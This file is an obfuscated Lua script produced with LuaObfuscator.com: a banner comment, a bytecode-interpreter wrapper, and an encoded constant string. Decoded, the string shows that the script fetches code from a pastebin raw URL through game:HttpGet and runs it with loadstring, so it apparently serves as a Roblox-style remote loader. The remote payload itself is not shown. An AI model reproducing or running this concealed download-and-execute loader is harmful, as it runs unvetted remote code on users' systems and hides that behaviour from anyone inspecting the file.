--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v129=0;local v130;while true do if (v129==0) then v130=v5(v88,v19);v19=nil;v129=1;end if (v129==1) then return v130;end end else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=0 -0 ;local v90;while true do if (v89==(0 -0)) then v90=(v31/((3 -(1066 -(68 + 997)))^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -((2127 -(226 + 1044)) + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + (3104 -2391))))) ;return v90-(v90%(1 + 0)) ;end end else local v91=0 + 0 ;local v92;while true do if (v91==(877 -(282 + 595))) then v92=(1639 -(1523 + 114))^(v32-(1 + 0)) ;return (((v31%(v92 + v92))>=v92) and (1 -(117 -(32 + 85)))) or 0 ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + 65)) ;v34=1;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==1) then return (v38 * (472 -(530 -314))) + v37 ;end if ((0 -0)==v36) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;v36=1 + 0 + 0 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + ((1008 -(915 + 82)) -8) );v18=v18 + (956 -(802 + 150)) ;return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * (187 + 69)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 + 0 + 0 ,26 -6 ) * ((1189 -(1069 + 118))^(72 -40))) + v43 ;local v47=v20(v44,45 -24 ,(778 -(201 + 571)) + 25 );local v48=((v20(v44,56 -24 )==((1139 -(116 + 1022)) + 0)) and  -(792 -((1531 -1163) + 423))) or 1 ;if (v47==(0 -0)) then if (v46==(18 -(10 + 8))) then return v48 * (0 -0) ;else v47=1;v45=442 -(416 + 26) ;end elseif (v47==(6535 -(2635 + 1853))) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/(((5432 -3944) -(998 + 488))^(17 + 35)))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v68=860 -(814 + 45) , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0 -0 ;end)();local v94=(function() return;end)();local v96=(function() return;end)();while true do if (v93==(0 -0)) then local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if (v123~=0) then else v124=(function() return 0;end)();while true do if (v124~=0) then else v94=(function() return v95();end)();v96=(function() return nil;end)();v124=(function() return 3 -2 ;end)();end if (v124==(1825 -(1195 + 629))) then v93=(function() return  #"[";end)();break;end end break;end end end if (v93== #"!") then if (v94== #"[") then v96=(function() return v95()~=(0 -0) ;end)();elseif (v94==(243 -(187 + 54))) then v96=(function() return v97();end)();elseif (v94== #"91(") then v96=(function() return v98();end)();end v99[v100]=(function() return v96;end)();break;end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v53=(function() return function(v101,v102,v103,v104,v105,v106,v107,v108,v109) local v110=(function() return 780 -(162 + 618) ;end)();local v101=(function() return;end)();local v102=(function() return;end)();while true do if (0~=v110) then else local v126=(function() return 0 + 0 ;end)();local v127=(function() return;end)();while true do if ((0 + 0)==v126) then v127=(function() return 0 -0 ;end)();while true do if (v127~=(1 -0)) then else v110=(function() return 1 + 0 ;end)();break;end if (0==v127) then v101=(function() return 1636 -(1373 + 263) ;end)();v102=(function() return nil;end)();v127=(function() return 1;end)();end end break;end end end if (v110~=(1001 -(451 + 549))) then else local v128=(function() return 0 + 0 ;end)();while true do if (0==v128) then while true do if (v101~=0) then else v102=(function() return v103();end)();if (v104(v102, #",", #"|")~=(0 -0)) then else local v171=(function() return 0 -0 ;end)();local v172=(function() return;end)();local v173=(function() return;end)();local v174=(function() return;end)();local v175=(function() return;end)();while true do if (v171==(1385 -(746 + 638))) then local v176=(function() return 0;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 0;end)();while true do if (v177==(1 + 0)) then v171=(function() return 2;end)();break;end if (v177~=0) then else v174=(function() return nil;end)();v175=(function() return nil;end)();v177=(function() return 1;end)();end end break;end end end if (v171==0) then local v178=(function() return 0;end)();local v179=(function() return;end)();while true do if (v178==(0 -0)) then v179=(function() return 341 -(218 + 123) ;end)();while true do if (v179==1) then v171=(function() return 1;end)();break;end if (v179==0) then v172=(function() return 0;end)();v173=(function() return nil;end)();v179=(function() return 1582 -(1535 + 46) ;end)();end end break;end end end if (v171==2) then while true do if (v172==(0 + 0)) then local v180=(function() return 0;end)();local v181=(function() return;end)();while true do if (v180==0) then v181=(function() return 0;end)();while true do if (v181==0) then v173=(function() return v104(v102,2, #"xnx");end)();v174=(function() return v104(v102, #"asd1",6);end)();v181=(function() return 1;end)();end if (v181==1) then v172=(function() return  #"!";end)();break;end end break;end end end if (v172==2) then local v182=(function() return 0 + 0 ;end)();local v183=(function() return;end)();while true do if (0~=v182) then else v183=(function() return 560 -(306 + 254) ;end)();while true do if (v183~=(0 + 0)) then else if (v104(v174, #",", #"~")== #"}") then v175[3 -1 ]=(function() return v105[v175[2]];end)();end if (v104(v174,1469 -(899 + 568) ,2 + 0 )~= #"~") then else v175[ #"gha"]=(function() return v105[v175[ #"asd"]];end)();end v183=(function() return 1;end)();end if (v183~=(2 -1)) then else v172=(function() return  #"asd";end)();break;end end break;end end end if (v172== #">") then local v184=(function() return 603 -(268 + 335) ;end)();while true do if (v184==0) then v175=(function() return {v106(),v106(),nil,nil};end)();if (v173==0) then local v187=(function() return 572 -(426 + 146) ;end)();local v188=(function() return;end)();while true do if (0==v187) then v188=(function() return 0;end)();while true do if (v188~=0) then else v175[ #"xxx"]=(function() return v106();end)();v175[ #"asd1"]=(function() return v106();end)();break;end end break;end end elseif (v173== #"{") then v175[ #"xxx"]=(function() return v107();end)();elseif (v173==(1 + 1)) then v175[ #"xnx"]=(function() return v107() -(2^(1472 -(282 + 1174))) ;end)();elseif (v173== #"-19") then local v195=(function() return 811 -(569 + 242) ;end)();while true do if (v195==(0 -0)) then v175[ #"19("]=(function() return v107() -((1 + 1)^16) ;end)();v175[ #"0836"]=(function() return v106();end)();break;end end end v184=(function() return 1;end)();end if (1==v184) then v172=(function() return 2;end)();break;end end end if (v172~= #"-19") then else if (v104(v174, #"xxx", #"xnx")~= #"{") then else v175[ #"0836"]=(function() return v105[v175[ #"?id="]];end)();end v108[v109]=(function() return v175;end)();break;end end break;end end end break;end end return v101,v102,v103,v104,v105,v106,v107,v108,v109;end end end end end;end)();local v54=(function() return function(v111,v112,v113) local v114=(function() return 0;end)();local v115=(function() return;end)();while true do if (v114~=(1024 -(706 + 318))) then else v115=(function() return 0;end)();while true do if (v115==0) then local v131=(function() return 1251 -(721 + 530) ;end)();while true do if (v131==(1271 -(945 + 326))) then v111[v112-#">" ]=(function() return v113();end)();return v111,v112,v113;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"!",v59 do FlatIdent_61B23,Type,v21,Cons,v24,v25,v60,v70=(function() return v52(FlatIdent_61B23,Type,v21,Cons,v24,v25,v60,v70);end)();end v58[ #"-19"]=(function() return v21();end)();for v71= #"|",v23() do FlatIdent_946F,Descriptor,v21,v20,v60,v22,v23,v55,v71=(function() return v53(FlatIdent_946F,Descriptor,v21,v20,v60,v22,v23,v55,v71);end)();end for v72= #":",v23() do v56,v72,v28=(function() return v54(v56,v72,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[2 -1 ];local v66=v62[2 + 0 ];local v67=v62[3];return function(...) local v73=v65;local v74=v66;local v75=v67;local v76=v27;local v77=701 -(271 + 429) ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -1 ;local v82={};local v83={};for v116=0,v81 do if (v116>=v75) then v79[v116-v75 ]=v80[v116 + (1087 -((874 -(15 + 398)) + 625)) ];else v83[v116]=v80[v116 + (127 -(116 + 10)) ];end end local v84=(v81-v75) + (1289 -(993 + 295)) ;local v85;local v86;while true do v85=v73[v77];v86=v85[1 + 0 ];if (v86<=(1178 -(418 + 753))) then if (v86<=(2 + 1)) then if (v86<=1) then if ((3629>=1417) and (v86>(0 + 0 + 0))) then local v132=v85[(983 -(18 + 964)) + 1 ];local v133=v83[v85[1 + (740 -(542 + 196)) ]];v83[v132 + ((1136 -606) -(406 + 123)) ]=v133;v83[v132]=v133[v85[1773 -(511 + 1238 + 20) ]];else local v137=v85[1 + 1 ];local v138,v139=v76(v83[v137](v13(v83,v137 + (1323 -(1249 + 73)) ,v85[2 + 1 ])));v78=(v139 + v137) -1 ;local v140=0;for v165=v137,v78 do v140=v140 + 1 ;v83[v165]=v138[v140];end end elseif ((4795>402) and (v86==(1147 -(466 + 679)))) then do return;end else do return;end end elseif ((4813>3565) and (v86<=((41 -30) -6))) then if (v86==4) then local v141=v85[5 -(2 + 1) ];local v142=v83[v85[3]];v83[v141 + (1901 -(106 + 1794)) ]=v142;v83[v141]=v142[v85[4]];else v83[v85[1 + 1 + 0 ]]={};end elseif (v86==6) then v83[v85[1 + 1 ]]();else local v147=v85[5 -(2 + 1) ];local v148,v149=v76(v83[v147](v13(v83,v147 + (2 -1) ,v85[117 -(2 + 2 + 110) ])));v78=(v149 + v147) -(585 -(57 + 527)) ;local v150=1427 -(41 + 1386) ;for v168=v147,v78 do v150=v150 + (104 -(17 + 86)) ;v83[v168]=v148[v150];end end elseif (v86<=((858 -(20 + 830)) + 3)) then if (v86<=(19 -10)) then if ((3912==3912) and (v86>(23 -15))) then v83[v85[(442 -274) -(122 + 44) ]]=v85[5 -2 ];else local v153=v85[6 -4 ];v83[v153]=v83[v153](v13(v83,v153 + 1 + (0 -0) ,v78));end elseif (v86>10) then v83[v85[2]]=v64[v85[1 + 2 ]];else v83[v85[3 -1 ]]=v85[3];end elseif (v86<=(78 -(30 + 35))) then if ((2821<=4824) and (v86==(9 + 3))) then v83[v85[2]]=v64[v85[3]];else v83[v85[1259 -(1043 + 214) ]]();end elseif ((1738<=2195) and (v86>(52 -38))) then local v161=v85[1214 -(323 + 889) ];v83[v161]=v83[v161](v13(v83,v161 + (2 -1) ,v78));else v83[v85[582 -(361 + 219) ]]={};end v77=v77 + (321 -(53 + 267)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F4431516B3769646D00094Q000E7Q00120B000100013Q00120B000200023Q00200100020002000300120A000400044Q0007000200044Q000800013Q00022Q00060001000100012Q00033Q00017Q00",v9(),...);
